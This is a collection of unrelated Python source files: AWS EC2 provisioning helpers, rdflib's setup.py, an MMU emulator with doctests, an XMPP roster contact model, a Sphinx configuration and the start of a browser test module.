Takes ECConnection object and SubnetId string. Attempts to set the
MapPublicIpOnLaunch attribute to True.
FIXME: give credit to source
"""
orig_api_version = ec.APIVersion
ec.APIVersion = '2014-06-15'
ec.get_status(
'ModifySubnetAttribute',
{'SubnetId': subnet_id, 'MapPublicIpOnLaunch.Value': 'true'},
verb='POST'
)
ec.APIVersion = orig_api_version
return None
def derive_ip_address( cidr_block, delegate, final8 ):
"""
Given a CIDR block string, a delegate number, and an integer
representing the final 8 bits of the IP address, construct and return
the IP address derived from this values. For example, if cidr_block is
10.0.0.0/16, the delegate number is 10, and the final8 is 8, the
derived IP address will be 10.0.10.8.
"""
result = ''
match = re.match( r'\d+\.\d+', cidr_block )
if match:
result = '{}.{}.{}'.format( match.group(0), delegate, final8 )
else:
raise SpinupError( "{} passed to derive_ip_address() is not a CIDR block!".format(cidr_block) )
return result
def get_master_instance( ec2_conn, subnet_id ):
"""
Given EC2Connection object and Master Subnet id, check that there is
just one instance running in that subnet - this is the Master. Raise
exception if the number of instances is != 0.
Return the Master instance object.
"""
instances = ec2_conn.get_only_instances( filters={ "subnet-id": subnet_id } )
if 1 > len(instances):
raise SpinupError( "There are no instances in the master subnet" )
if 1 < len(instances):
raise SpinupError( "There are too many instances in the master subnet" )
return instances[0]
def template_token_subst( buf, key, val ):
"""
Given a string (buf), a key (e.g. '@@MASTER_IP@@') and val, replace all
occurrences of key in buf with val. Return the new string.
"""
targetre = re.compile( re.escape( key ) )
return re.sub( targetre, str(val), buf )
def process_user_data( fn, vars = [] ):
"""
Given filename of user-data file and a list of environment
variable names, replaces @@...@@ tokens with the values of the
environment variables. Returns the user-data string on success
raises exception on failure.
"""
# Get user_data string.
buf = read_user_data( fn )
for e in vars:
if not e in environ:
raise SpinupError( "Missing environment variable {}!".format( e ) )
buf = template_token_subst( buf, '@@'+e+'@@', environ[e] )
return buf
def count_instances_in_subnet( ec, subnet_id ):
"""
Given EC2Connection object and subnet ID, count number of instances
in that subnet and return it.
"""
instance_list = ec.get_only_instances(
filters={ "subnet-id": subnet_id }
)
return len(instance_list)
def make_reservation( ec, ami_id, **kwargs ):
"""
Given EC2Connection object, delegate number, AMI ID, as well as
all the kwargs referred to below, make a reservation for an instance
and return the registration object.
"""
# extract arguments to be passed to ec.run_instances()
our_kwargs = {
"key_name": kwargs['key_name'],
"subnet_id": kwargs['subnet_id'],
"instance_type": kwargs['instance_type'],
"private_ip_address": kwargs['private_ip_address']
}
# Master or minion?
if kwargs['master']:
our_kwargs['user_data'] = kwargs['user_data']
else:
# perform token substitution in user-data string
u = kwargs['user_data']
u = template_token_subst( u, '@@MASTER_IP@@', kwargs['master_ip'] )
u = template_token_subst( u, '@@DELEGATE@@', kwargs['delegate_no'] )
u = template_token_subst( u, '@@ROLE@@', kwargs['role'] )
u = template_token_subst( u, '@@NODE_NO@@', kwargs['node_no'] )
our_kwargs['user_data'] = u
# Make the reservation.
reservation = ec.run_instances( ami_id, **our_kwargs )
# Return the reservation object.
return reservation
def wait_for_running( ec2_conn, instance_id ):
"""
Given an instance id, wait for its state to change to "running".
"""
print "Waiting for {} running state".format( instance_id )
while True:
instances = ec2_conn.get_only_instances( instance_ids=[ instance_id ] )
print "Current state is {}".format( instances[0].state )
if instances[0].state != 'running':
print "Sleeping for 5 seconds"
time.sleep(5)
else:
print "Waiting another 5 seconds for good measure"
time.sleep(5)
break
def wait_for_available( ec2_conn, volume_id ):
"""
Given a volume id, wait for its state to change to "available".
"""
print "Waiting for {} available state".format( volume_id )
while True:
volumes = ec2_conn.get_all_volumes( volume_ids=[ volume_id ] )
print "Current status is {}".format( volumes[0].status )
if volumes[0].status != 'available':
print "Sleeping for 5 seconds"
time.sleep(5)
else:
break
def wait_for_detachment( ec2_conn, v_id, i_id ):
"""
Given a volume ID and an instance ID, wait for volume to
become detached.
"""
print "Waiting for volume {} to be detached from instnace {}".format(v_id, i_id)
while True:
attached_vol = ec2_conn.get_all_volumes(
filters={
"volume-id": v_id,
"attachment.instance-id": i_id,
"attachment.device": "/dev/sdb"
}
)
print "attached_vol == {}".format(attached_vol)
if attached_vol is None or len(attached_vol) == 0:
print "Detached!"
break
else:
time.sleep(5)
print "Still attached."
|
import sys
import os
import re
def setup_python3():
# Taken from "distribute" setup.py
from distutils.filelist import FileList
from distutils import dir_util, file_util, util, log
from os.path import join, exists
tmp_src = join("build", "src")
# Not covered by "setup.py clean --all", so explicit deletion required.
if exists(tmp_src):
dir_util.remove_tree(tmp_src)
log.set_verbosity(1)
fl = FileList()
for line in open("MANIFEST.in"):
if not line.strip():
continue
fl.process_template_line(line)
dir_util.create_tree(tmp_src, fl.files)
outfiles_2to3 = []
for f in fl.files:
outf, copied = file_util.copy_file(f, join(tmp_src, f), update=1)
if copied and outf.endswith(".py"):
outfiles_2to3.append(outf)
util.run_2to3(outfiles_2to3)
# arrange setup to use the copy
sys.path.insert(0, tmp_src)
return tmp_src
kwargs = {}
if sys.version_info[0] >= 3:
from setuptools import setup
kwargs['use_2to3'] = True
kwargs['install_requires'] = ['isodate', 'pyparsing']
kwargs['tests_require'] = ['html5lib']
kwargs['requires'] = [
'isodate', 'pyparsing',
'SPARQLWrapper']
kwargs['src_root'] = setup_python3()
assert setup
else:
try:
from setuptools import setup
assert setup
kwargs['test_suite'] = "nose.collector"
kwargs['install_requires'] = [
'isodate',
'pyparsing', 'SPARQLWrapper']
if sys.version_info[1]<7: # Python 2.6
kwargs['install_requires'].append('ordereddict')
if sys.version_info[1]<6: # Python 2.5
kwargs['install_requires'].append('pyparsing<=1.5.7')
kwargs['install_requires'].append('simplejson')
kwargs['install_requires'].append('html5lib==0.95')
else:
kwargs['install_requires'].append('html5lib')
except ImportError:
from distutils.core import setup
def find_version(filename):
_version_re = re.compile(r'__version__ = "(.*)"')
for line in open(filename):
version_match = _version_re.match(line)
if version_match:
return version_match.group(1)
version = find_version('rdflib/__init__.py')
packages = ['rdflib',
'rdflib/extras',
'rdflib/plugins',
'rdflib/plugins/parsers',
'rdflib/plugins/parsers/pyRdfa',
'rdflib/plugins/parsers/pyRdfa/transform',
'rdflib/plugins/parsers/pyRdfa/extras',
'rdflib/plugins/parsers/pyRdfa/host',
'rdflib/plugins/parsers/pyRdfa/rdfs',
'rdflib/plugins/parsers/pyMicrodata',
'rdflib/plugins/serializers',
'rdflib/plugins/sparql',
'rdflib/plugins/sparql/results',
'rdflib/plugins/stores',
'rdflib/tools'
]
if os.environ.get('READTHEDOCS', None):
# if building docs for RTD
# install examples, to get docstrings
packages.append("examples")
setup(
name='rdflib',
version=version,
description="RDFLib is a Python library for working with RDF, a " + \
"simple yet powerful language for representing information.",
author="Daniel 'eikeon' Krech",
author_email="eikeon@eikeon.com",
maintainer="RDFLib Team",
maintainer_email="rdflib-dev@google.com",
url="https://github.com/RDFLib/rdflib",
license="https://raw.github.com/RDFLib/rdflib/master/LICENSE",
platforms=["any"],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 2.5",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
"Natural Language :: English",
],
long_description="""\
RDFLib is a Python library for working with
RDF, a simple yet powerful language for representing information.
The library contains parsers and serializers for RDF/XML, N3,
NTriples, Turtle, TriX, RDFa and Microdata . The library presents
a Graph interface which can be backed by any one of a number of
Store implementations. The core rdflib includes store
implementations for in memory storage, persistent storage on top
of the Berkeley DB, and a wrapper for remote SPARQL endpoints.
A SPARQL 1.1 engine is also included.
If you have recently reported a bug marked as fixed, or have a craving for
the very latest, you may want the development version instead:
easy_install https://github.com/RDFLib/rdflib/tarball/master
Read the docs at:
http://rdflib.readthedocs.org
""",
packages = packages,
entry_points = {
'console_scripts': [
'rdfpipe = rdflib.tools.rdfpipe:main',
'csv2rdf = rdflib.tools.csv2rdf:main',
'rdf2dot = rdflib.tools.rdf2dot:main',
'rdfs2dot = rdflib.tools.rdfs2dot:main',
'rdfgraphisomorphism = rdflib.tools.graphisomorphism:main',
],
},
**kwargs
)
|
try:
from primitives import Mem
except ImportError:
from mem import Mem
import sys
if sys.version >= '3':
xrange = range
class MMU():
def __init__(self, mem, size=0):
""" Initialize MMU
"""
self._enabled = False
self._mem = mem
self._wordsize = 4
self._table = []
def isEnabled(self):
return self._enabled
def enable(self):
""" Enables MMU
"""
self._enabled = True
def disable(self):
""" Disables MMU
"""
self._enabled = False
def getEntries(self, entries, startpos=None):
""" Get page entries and parse them, handle recursively
>>> from primitives import Mem
>>> m = Mem(1024*1024)
>>> m.setData(0, 0x00000100, 4)
>>> m.setData(4, 0x00001100, 4)
>>> m.setData(8, 0x00002100, 4)
>>> m.setData(12, 0x00003100, 4)
>>> u = MMU(m)
>>> entries = [(0, MMU.Flags(solved={'execute': False, 'ok': True, 'size1': False, 'size2': False, 'write': False, 'subtable': True, 'userspace': False, 'size': 4*1024}), 0),
... (32768, MMU.Flags(solved={'execute': False, 'ok': True, 'size1': True, 'size2': False, 'write': False, 'subtable': False, 'userspace': False, 'size': 64}), 65536),
... (0, MMU.Flags(solved={'execute': False, 'ok': True, 'size1': False, 'size2': False, 'write': False, 'subtable': False, 'userspace': False, 'size': 4}), 131072)]
>>> u.getEntries(entries)
[(0, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0), (4096, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 4096), (8192, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 8192), (12288, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 12288), (32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 65536), (0, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 131072)]
"""
if startpos is None:
startpos = 0
subs = []
for (addr, flags, pos) in entries:
if flags['subtable']:
size = flags['size'] * 1024 / 4
if flags['ok']:
tmp = self.readTable(addr, size, pos)
entries = self.getEntries(tmp, startpos)
subs += entries
startpos += flags['size'] * 1024
else:
if flags['ok']:
subs.append((addr, flags, pos))
return subs
def initialize(self, tablepos, tablesize):
""" Initializes MMU with a initial page
Does recursive parsing
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Subtable, starts at phys 4k
>>> m.setData(22, 0x00001111, 4)
>>> # Page, virtual start at 32k, size 64k
>>> m.setData(14, 0x00008110, 4)
>>> # Page, virtual start at 98k, size 4k
>>> m.setData(18, 0x00018100, 4)
>>> for i in xrange(1023):
... m.setData(0x1000 + i, 0)
>>> # Page at 8k, size 4k
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at 12k, size 1M
>>> m.setData(0x1004, 0x00003120, 4)
>>> u.initialize(14, 3)
[(32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 0), (98304, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 65536), (8192, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 69632), (12288, execute=False,ok=True,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False, 73728)]
"""
entries = self.readTable(tablepos, tablesize)
self._table = self.getEntries(entries)
return self._table
def diffTime(self, a, b):
d = a - b
print (d.seconds*1000*1000 + d.microseconds)
def readTable(self, tablepos, tablesize, pos=None):
""" Reads table from memory
>>> from primitives import Mem
>>> m = Mem(1024*100)
>>> u = MMU(m)
>>> # Subtable, starts at phys 4k
>>> m.setData(10, 0x00001111, 4)
>>> # Page, starts at 32k, size 64k
>>> m.setData(14, 0x00008110, 4)
>>> for i in xrange(1023):
... m.setData(0x1000 + i, 0)
>>> tmp = u.readTable(10, 3)
>>> tmp[0][0]
4096
>>> tmp[1][0]
32768
>>> tmp[0][1]
execute=False,ok=True,size=65536,size1=True,size2=False,subtable=True,userspace=False,write=False
>>> tmp[1][1]
execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> tmp[0]
(4096, execute=False,ok=True,size=65536,size1=True,size2=False,subtable=True,userspace=False,write=False, 0)
>>> tmp[1]
(32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 67108864)
"""
import datetime
datas = []
if pos is None:
pos = 0
virtpos = tablepos
cnt = 0
# Optimized reading in blocks instead of one byte at time
block = self._mem.getBlock(tablepos, tablesize * 4)
oldtmp = 0
items = 0
preindex = 0
for (bpos, data) in block:
if data is None:
continue
if preindex > 0:
# Do we have old data from previous block?
if preindex == 1:
oldtmp += (data[0] << 24)
if preindex == 2:
oldtmp += (data[0] << 16) + (data[1] << 24)
if preindex == 3:
oldtmp += (data[0] << 8) + (data[1] << 16) + (data[2] << 24)
(ok, pos, res) = self.readEntry(oldtmp, pos)
if ok:
datas.append(res)
tablepos = preindex
datalen = len(data)
l = int(datalen / 4 - 1)
index = tablepos % 0x1000
for item in xrange(l):
tmp = data[index] + (data[index+1] << 8) + (data[index+2] << 16) + (data[index+3] << 24)
(ok, pos, res) = self.readEntry(tmp, pos)
if ok:
datas.append(res)
index += 4
items += 4
if index > datalen - 4:
miss = datalen - index
preindex = 0
# Check if we didn't read all the data...
if miss > 0:
oldtmp = data[index]
if miss > 1:
oldtmp += (data[index+1] << 8)
if miss > 2:
oldtmp += (data[index+2] << 16)
preindex = 4 - miss
break
if items > (tablesize + tablepos):
break
return datas
"""
for index in xrange(tablesize):
tmp = self._mem.getData(virtpos, self._wordsize)
virtpos += self._wordsize
if tmp > 0:
print tmp
cnt += 1
(ok, pos, res) = self.readEntry(tmp, pos)
if ok:
datas.append(res)
return datas
"""
def readEntry(self, data, pos=0):
""" Read entry from one page table item data
>>> m = Mem()
>>> u = MMU(m)
>>> u.readEntry(0x00000000)
(False, 0, (0, execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0))
>>> u.readEntry(0x00001000)
(True, 4096, (4096, execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0))
>>> u.readEntry(0x00001111)
(True, 67108864, (4096, execute=False,ok=True,size=65536,size1=True,size2=False,subtable=True,userspace=False,write=False, 0))
>>> u.readEntry(0x00001022)
(True, 1048576, (4096, execute=True,ok=False,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False, 0))
>>> u.readEntry(0x00002FFF)
(True, 68719476736, (8192, execute=True,ok=True,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True, 0))
>>> u.readEntry(0xFFFFFFFF)
(True, 68719476736, (4294963200, execute=True,ok=True,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True, 0))
>>> u.readEntry(0)
(False, 0, (0, execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0))
"""
if data > 0:
flags = MMU.Flags(data & 0xFFF)
vaddr = data & 0xFFFFF000
ok = True
else:
vaddr = 0
flags = MMU.Flags(data & 0xFFF)
ok = False
return (ok, pos, (vaddr, flags, pos))
return (ok, pos + flags['size'] * 1024, (vaddr, flags, pos))
def getRange(self, item):
addr = item[0]
flags = item[1]
pos = item[2]
endaddr = addr + (flags['size'] * 1024)
return (addr, endaddr, pos)
def virtToPhys(self, pos):
""" Converts virtual memory location to physical
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Page, virtual start at 96k, size 4k (0x1000)
>>> m.setData(14, 0x00018100, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Subtable, starts at phys 4k, size 4M
>>> m.setData(22, 0x00001101, 4)
>>> # Page at virtual at 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual at 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> tmp = u.initialize(10, 5)
>>> u.virtToPhys(0x8000) == (0x2000)
True
>>> u.virtToPhys(0x8000)
8192
>>> u.virtToPhys(0x8001)
8193
>>> u.virtToPhys(0x2000)
73728
>>> u.virtToPhys(0x2000) == (0x2000 + 0x10000)
True
>>> u.virtToPhys(0x2010) == (0x2000 + 0x10000 + 0x10)
True
>>> u.virtToPhys(0x2FFF) == (0x2000 + 0x10000 + 0xFFF)
True
>>> u.virtToPhys(0x18000) == 0x1000
True
>>> u.virtToPhys(0x19000) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019000
>>> u.virtToPhys(0x19001) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019001
>>> u.virtToPhys(0x1A000) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 0001A000
>>> u.virtToPhys(0) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00000000
"""
for item in self._table:
(a, b, c) = self.getRange(item)
if a <= pos and pos < b:
index = (pos - a)
phys = c + index
return phys
raise IndexError('No page mapped at virtual: %.8X' % (pos))
def getPageFlags(self, pos):
""" Get flags at position
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Subtable, starts at phys 4k (0x1000)
>>> m.setData(14, 0x00001101, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Page, virtual start at 96, size 4k (0x1000)
>>> m.setData(22, 0x00018100, 4)
>>> # Page at virtual 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> tmp = u.initialize(10, 4)
>>> u.enable()
>>> u.getPageFlags(0x8000)
execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x8001)
execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x18000)
execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x18010)
execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x19000)
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019000
>>> u.getPageFlags(0x19001) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019001
>>> u.getPageFlags(0x1A000) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 0001A000
>>> u.getPageFlags(0x18fff)
execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00000000
"""
if not self._enabled:
return None
for item in self._table:
(a, b, c) = self.getRange(item)
if a <= pos and pos < b:
return item[1]
raise IndexError('No page mapped at virtual: %.8X' % (pos))
def setData(self, pos, data, size=4):
""" Set data, if MMU enabled, solve physical locations first
>>> from primitives import Mem
>>> m = Mem(1024*1024*5)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Page, virtual start at 96, size 4k (0x1000)
>>> m.setData(14, 0x00018100, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Subtable, starts at phys 4k, size 4M (0x1000)
>>> m.setData(22, 0x00001101, 4)
>>> # Page at virtual 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> tmp = u.initialize(10, 4)
>>> # Paging is disabled, set data to phys 0x8000
>>> u.setData(0x8000, 56, 1)
>>> # Enable paging
>>> u.enable()
>>> # Paging is enabled so set data to virt 0x8000, which is 0x2000 in phys
>>> u.setData(0x8000, 42, 1)
>>> # Get memory contents at 0x8000 phys
>>> m.getData(0x8000, 1)
56
>>> # Get memory contents at 0x2000 phys
>>> m.getData(0x2000, 1)
42
"""
if self._enabled:
self._mem.setData(self.virtToPhys(pos), data, size)
else:
self._mem.setData(pos, data, size)
def getData(self, pos, size=1):
""" Get data, if MMU enabled, solve physical location first
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Subtable, starts at phys 4k (0x1000)
>>> m.setData(14, 0x00001101, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Page, virtual start at 96k, size 4k (0x1000)
>>> m.setData(22, 0x00018100, 4)
>>> # Page at virtual 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> u.initialize(10, 4)
[(24576, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0), (8192, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 4096), (1126400, execute=False,ok=True,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False, 8192), (32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 4198400), (98304, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 4263936)]
>>> # Paging is disabled, set data to phys 0x8000
>>> u.setData(0x8000, 56, 1)
>>> # Paging is disabled, set data to phys 0x100
>>> u.setData(0x100, 12345, 4)
>>> # Enable paging
>>> u.enable()
>>> # Paging is enabled so set data to virt 0x8000, which is 0x2000 in phys
>>> u.setData(0x8000, 42, 1)
>>> # Get memory contents at 0x8000 virt
>>> u.getData(0x8000, 1)
42
>>> # Get memory contents at 0x100 phys, 0x6000+0x100 virt
>>> u.getData(0x6000 + 0x100, 4)
12345
"""
if self._enabled:
return self._mem.getData(self.virtToPhys(pos), size)
else:
return self._mem.getData(pos, size)
def setRaw(self, pos, data):
""" Set one byte, if MMU enabled, solve physical location first
>>> from primitives import Mem
>>> m = Mem(1024*100)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> tmp = u.initialize(10, 1)
>>> u.setRaw(0x100, 255)
>>> u.enable()
>>> u.setRaw(0x6001, 123)
>>> m.getRaw(0x100)
255
>>> m.getRaw(0x1)
123
"""
if self._enabled:
self._mem.setRaw(self.virtToPhys(pos), data)
else:
self._mem.setRaw(pos, data)
def getRaw(self, pos):
""" Get one byte, if MMU enabled, solve physical location first
>>> from primitives import Mem
>>> m = Mem(1024*100)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> tmp = u.initialize(10, 1)
>>> u.setRaw(0x100, 255)
>>> u.enable()
>>> u.setRaw(0x6001, 123)
>>> m.getRaw(0x100)
255
>>> m.getRaw(0x1)
123
>>> u.getRaw(0x6001)
123
>>> u.getRaw(0x6000)
0
"""
if self._enabled:
return self._mem.getRaw(self.virtToPhys(pos))
else:
return self._mem.getRaw(pos)
class Flags:
def __init__(self, flags=0, solved=None):
""" Initialize flags
"""
self._flags = flags
if solved is None:
self._data = self.solveFlags(flags)
else:
self._data = solved
def solveFlags(self, flags):
""" Solve flags from given number data
>>> f = MMU.Flags()
>>> r = f.solveFlags(0x1)
>>> f
execute=False,ok=False,size=4096,size1=False,size2=False,subtable=True,userspace=False,write=False
>>> r = f.solveFlags(0x2)
>>> f
execute=True,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x4)
>>> f
execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=True
>>> r = f.solveFlags(0x8)
>>> f
execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=True,write=False
>>> r = f.solveFlags(0x10)
>>> f
execute=False,ok=False,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x20)
>>> f
execute=False,ok=False,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x30)
>>> f
execute=False,ok=False,size=65536,size1=True,size2=True,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x40)
>>> f
execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0xFF)
>>> f
execute=True,ok=False,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True
>>> r = f.solveFlags(0x1FF)
>>> f
execute=True,ok=True,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True
"""
data = {
'subtable': False,
'execute': False,
'write': False,
'userspace': False,
'size': 0,
'size1': False,
'size2': False,
'ok': False,
}
#'size3': False,
if flags & 0x1 == 0x1:
data['subtable'] = True
if flags & 0x2 == 0x2:
data['execute'] = True
if flags & 0x4 == 0x4:
data['write'] = True
if flags & 0x8 == 0x8:
data['userspace'] = True
if flags & 0x10 == 0x10:
data['size1'] = True
if flags & 0x20 == 0x20:
data['size2'] = True
if flags & 0x100 == 0x100:
data['ok'] = True
# Determine page size in kilobytes
if not data['size1'] and not data['size2']:
data['size'] = 4
elif data['size1'] and not data['size2']:
data['size'] = 64
elif not data['size1'] and data['size2']:
data['size'] = 1024
elif data['size1'] and data['size2']:
data['size'] = 1024 * 64
# For subtables multiply by 1024
if data['subtable']:
data['size'] *= 1024
self._data = data
return data
def isSet(self, name):
""" Checks whether element is set, or get value
>>> f = MMU.Flags(0x1F)
>>> f.isSet('size')
65536
>>> f.isSet('size1')
True
>>> f.isSet('size2')
False
>>> f.isSet('subtable')
True
"""
if not name in self._data:
return False
return self._data[name]
def __getitem__(self, name):
if not name in self._data:
return None
return self._data[name]
def dump(self):
""" Dumps the flag status
"""
return self._data
def __repr__(self):
""" Get string representation of the flags
"""
#return "%s" % self.dump()
a = self._data.keys()
res = ''
for k in sorted(a):
if res:
res += ','
res += '%s=%s' % (k, self._data[k])
return res
"""
MMU
Initial table
if __name__ == "__main__":
import doctest
doctest.run_docstring_examples(MMU.initialize, globals())
"""
|
"""
pyfire.contact
~~~~~~~~~~
Handles Contact ("roster item") interpretation as per RFC-6121
:copyright: 2011 by the pyfire Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import xml.etree.ElementTree as ET
from sqlalchemy import Table, Column, Boolean, Integer, String, Enum, ForeignKey
from sqlalchemy.orm import relationship, backref
from pyfire.jid import JID
from pyfire.storage import Base, JIDString
contacts_groups = Table('contacts_groups', Base.metadata,
Column('contact_id', Integer, ForeignKey('contacts.id')),
Column('group_id', Integer, ForeignKey('groups.id'))
)
class Roster(Base):
"""List of contacts for a given jid"""
__tablename__ = 'rosters'
id = Column(Integer, primary_key=True)
jid = Column(JIDString, nullable=False)
def __init__(self, jid):
self.jid = JID(jid)
class Group(Base):
"""Simple group, only providing a name for now"""
__tablename__ = 'groups'
id = Column(Integer, primary_key=True)
name = Column(String(255))
class Contact(Base):
"""Jabber Contact, aka roster item. It has some really strict attribute
setting mechanism as it leads to all kinds of fantastic crashes with
clients which should be avoided in any case.
"""
__tablename__ = 'contacts'
id = Column(Integer, primary_key=True)
approved = Column(Boolean)
ask = Column(Enum('subscribe'))
jid = Column(JIDString, nullable=False)
name = Column(String(255))
subscription = Column(Enum("none", "from", "to", "remove", "both"))
groups = relationship(Group, secondary=contacts_groups)
roster = relationship(Roster, backref=backref('contacts'))
roster_id = Column(Integer, ForeignKey('rosters.id'), nullable=False)
def __init__(self, jid, **kwds):
super(Contact, self).__init__()
# required
if isinstance(jid, basestring):
self.jid = JID(jid)
elif isinstance(jid, JID):
self.jid = jid
self.jid.validate(raise_error=True)
else:
raise AttributeError("Needs valid jid either as string or JID instance")
# optional
self.approved = False
self.ask = None
self.name = None
self.subscription = "none"
self.groups = []
for k, v in kwds.iteritems():
setattr(self, k, v)
def to_element(self):
"""Formats contact as `class`:ET.Element object"""
element = ET.Element("item")
if self.approved is not None:
element.set("approved", 'true' if self.approved else 'false')
if self.ask is not None:
element.set("ask", self.ask)
element.set("jid", str(self.jid))
if self.name is not None:
element.set("name", self.name)
if self.subscription is not None:
element.set("subscription", self.subscription)
for group in self.groups:
group_element = ET.SubElement(element, "group")
group_element.text = group
return element
@staticmethod
def from_element(element):
"""Creates contact instance from `class`:ET.Element"""
if element.tag != "item":
raise ValueError("Invalid element with tag %s" % element.tag)
cont = Contact(element.get('jid'))
cont.ask = element.get('ask')
cont.subscription = element.get('subscription')
approved = element.get('approved')
if approved == 'true':
cont.approved = True
elif approved == 'false':
cont.approved = False
else:
cont.approved = approved
for group in list(element):
if group.tag == "group":
cont.groups.append(group.text)
return cont
|
import sys, os
import datetime
extensions = ['sphinx.ext.autodoc']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'example_project'
copyright = u'%d, Lincoln Loop' % datetime.date.today().year
version = '1.0'
release = '1.0'
exclude_trees = ['_build']
pygments_style = 'sphinx'
html_theme = 'default'
html_static_path = ['_static']
htmlhelp_basename = 'example_projectdoc'
latex_documents = [
('index', 'example_project.tex', u'example_project Documentation',
u'Lincoln Loop', 'manual'),
]
|
import os
import unittest
import sys
from splinter import Browser
from .base import BaseBrowserTests
from .fake_webapp import EXAMPLE_APP
